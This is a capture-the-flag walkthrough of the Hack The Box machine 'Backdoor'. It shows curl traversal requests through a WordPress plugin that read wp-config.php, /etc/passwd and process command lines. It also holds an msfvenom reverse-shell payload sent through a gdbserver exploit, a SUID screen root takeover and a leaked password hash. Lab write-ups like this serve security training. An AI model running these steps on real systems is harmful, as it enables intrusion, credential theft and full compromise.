0x1 Recon
Nmap
nmap -sC -sV -T4 -p- backdoor.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Manual
The 1337 is open and that's unusual. I know it's a common port for malicious backdoors so I first decided to explore that route. I tried to connect to it wth netcat.
nc backdoor.htb 1337
A tcp connection is created but I don't get a shell. I wasted a long time on that port, tried various things including socat, telnet, sending http requests... But never got any response.
0x1 Enum
The http server runs wordpress so I launched wpscan with user enumeration.
wpscan --url backdoor.htb -e u
A few vulnerabilities were found but nothing that could lead to foothold. It discovered the default user 'admin'
From there I did a gobuster enumeration but didn't find anything other than the usual wordpress stuff. I also tried bruteforcing admin password on the wp-login.php page but in vain.
I got stuck at this stage and decided to get a small hint from htb's forum. Someone wrote "don't forget to enumerate plugins". Wpscan did that enumeration but didn't find anything, my mistake was to trust wpscan too much and not to enumerate them manualy.
So I access the http://backdoor.htb/wp-content/plugins and find one name "Ebook-download"
Google informs me there is a Directory Traversal vulnerability (https://www.exploit-db.com/exploits/39575) so let's find interesting files.
I started getting the wp-config.php.
curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
I got the database details including the password. I tried that password to login as admin on wp but didn't work.
Then I looked for the passwd file.
curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../etc/passwd
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
I discover the user 'user'. I tried ssh user@backdoor.htb with the db password found earlier, but no luck.
I looked for various important files but nothing useful. My goal was to find out which process is running on port 1337. I have no idea how to get that information without command execution. So I did a few research and found this blogpost : https://www.netspi.com/blog/technical/web-application-penetration-testing/directory-traversal-file-inclusion-proc-file-system/
I discover that accessing /proc/[PID]/cmdline "Lists everything that was used to invoke the process. This sometimes contains useful paths to configuration files as well as usernames and passwords."
I though I'll probably have to write a python script to bruteforce the PID and get the cmdline for each of them. But another part of the blogpost is interesting :
/proc/sched_debugThis is usually enabled on newer systems, such as RHEL 6. It provides information as to what process is running on which cpu. This can be handy to get a list of processes and their PID number.
Let's start with that.
curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../proc/sched_debug
I got a long list of processes running on the machine with their names and their PID.
Here's just a small part of it :
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd-logind 767 189.972794 4009 120 0.000000 386.163280 0.000000 0 0 /autogroup-44
S cron 797 485.874123 1045 120 0.000000 132.391170 0.000000 0 0 /autogroup-54
S sh 820 442629.902892 118176 120 0.000000 21593.906290 0.000000 0 0 /autogroup-59
S sh 822 361.020061 76 120 0.000000 11.597600 0.000000 0 0 /autogroup-60
S apache2 855 469799.565655 59517 120 0.000000 3773.929180 0.000000 0 0 /autogroup-69
S systemd 883 25.103698 100 120 0.000000 66.041240 0.000000 0 0 /autogroup-76
S mysqld 926 194474.374286 192006 120 0.000000 10091.735710 0.000000 0 0 /autogroup-80
S ib_io_wr-2 1021 201005.565186 116672 120 0.000000 1686.664770 0.000000 0 0 /autogroup-80
S ib_io_wr-3 1022 201005.585556 116833 120 0.000000 1678.516080 0.000000 0 0 /autogroup-80
S ib_pg_flush_co 1024 201005.543436 60566 120 0.000000 3418.442960 0.000000 0 0 /autogroup-80
Sib_log_fl_notif 1026 201010.526146 565523 120 0.000000 9178.052940 0.000000 0 0 /autogroup-80
S ib_log_flush 1027 201010.529966 567862 120 0.000000 11888.349240 0.000000 0 0 /autogroup-80
Sib_log_wr_notif 1028 201010.516296 564189 120 0.000000 9021.420950 0.000000 0 0 /autogroup-80
S ib_log_writer 1029 201010.512936 565720 120 0.000000 9556.185570 0.000000 0 0 /autogroup-80
S ib_srv_lock_to 1034 201005.611896 58999 120 0.000000 1784.936210 0.000000 0 0 /autogroup-80
S ib_srv_mon 1036 201005.592456 11686 120 0.000000 262.459990 0.000000 0 0 /autogroup-80
t true 104782 10.864866 4 120 0.000000 1.002930 0.000000 0 0 /autogroup-208
S apache2 126766 469789.009115 24 120 0.000000 15.437790 0.000000 0 0 /autogroup-69
S apache2 126767 469787.769045 20 120 0.000000 8.487440 0.000000 0 0 /autogroup-69
>R apache2 126768 469793.893875 16 120 0.000000 9.355570 0.000000 0 0 /autogroup-69
S upowerd 157537 47.591914 72 120 0.000000 55.223480 0.000000 0 0 /autogroup-252
S gmain 157539 8.393746 1 120 0.000000 0.135740 0.000000 0 0 /autogroup-252
In the long list, I noticed two sh process and I was thinking if its a reverse shell of some sort that runs on port 1337, its potentially running via sh. So I get the PID of these two process and get their cmdline.
curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../proc/822/cmdline --output -
One of them returned :
while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337
That way I discovered the gdbserver running on port 1337.
I guess the intended way to find that information was via PID brutefoce, either with burp or with a python script. That would have been my next step. I just got lucky with sh.
Then a quick search tells me there is a gdbserver exploit : https://www.exploit-db.com/exploits/50539
0x3 Exploit
This step is pretty straightforward, everything is clearly explained in the exploit. I created a reverse shell :
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin
setup a nc listener on port 4444 and run the exploit:
python3 exploit.py 10.10.11.125:1337 rev.bin
I get a shell as 'user' and get the user.txt flag.
0x4 PrivEsc
I did a manual enumeration of various things. I also got the password hash of the admin user of the wordpress : $P$Bt8c3ivanSGd2TFcm3HV/9ezXPueg5. Maybe I could try to crack it with hashcat later.
The interesting thing was the SUID binaries that i found via find / -perm -u=s -type f 2>/dev/null
Here's the list:
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
screen is unusual.
I tried listing the screen sessions with screen -ls but it didn't give me anything. I did some research and found out that the suid bit is set on screen when you want to make it multiuser. It means that one user can get the session of another user. So let's try to attach a root screen session with screen -x root/
It worked. I got a root shell and captured the root.txt flag.
-l1ge.